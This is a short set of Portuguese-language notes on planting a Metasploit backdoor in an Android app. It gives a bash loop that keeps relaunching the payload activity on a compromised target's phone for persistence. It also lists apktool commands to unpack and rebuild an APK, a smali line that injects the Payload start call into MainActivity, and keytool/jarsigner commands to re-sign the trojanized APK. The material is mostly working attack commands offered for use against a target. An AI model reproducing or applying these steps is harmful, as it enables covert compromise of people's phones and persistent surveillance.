Script para executar no Android do alvo após invadir, para manter persistência mesmo após fechar o App malicioso
#!/bin/bash
while:
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 15
done
apktool b -o teste.apk teste/
apktool d teste.apk
apktool empty-framework-dir —force
<aside>
💡 Caso dê problemas para executar o comando APKTOOL, basta como alternativa baixar o .jar e usar através do comando:
java -jar apktool.jar <command> <option>
</aside>
Encontrar o arquivo principal de execução Smali
find ./ -name *.smali -exec grep -H -i ";→onCreate" {} \\;
Invocar um Payload (backdoor, exploit) no MainActivity Smali, para executar quando o alvo executar o APP.
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
Gerar nova chave de assinatura para APK recompilado
keytool -genkey -v -keystore debug.keystore -storepass android -alias nomechave -keypass android -keyalg RSA -keysize 2048 -vailidity 10000
Assinar com chave gerada
./jdk1.8/bin/jarsigner -verbose -keystore debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA teste.apk nomechave
Instalar jd-gui _ dex2jar _ jadx.txt
Análise de APK ou APP direto via USB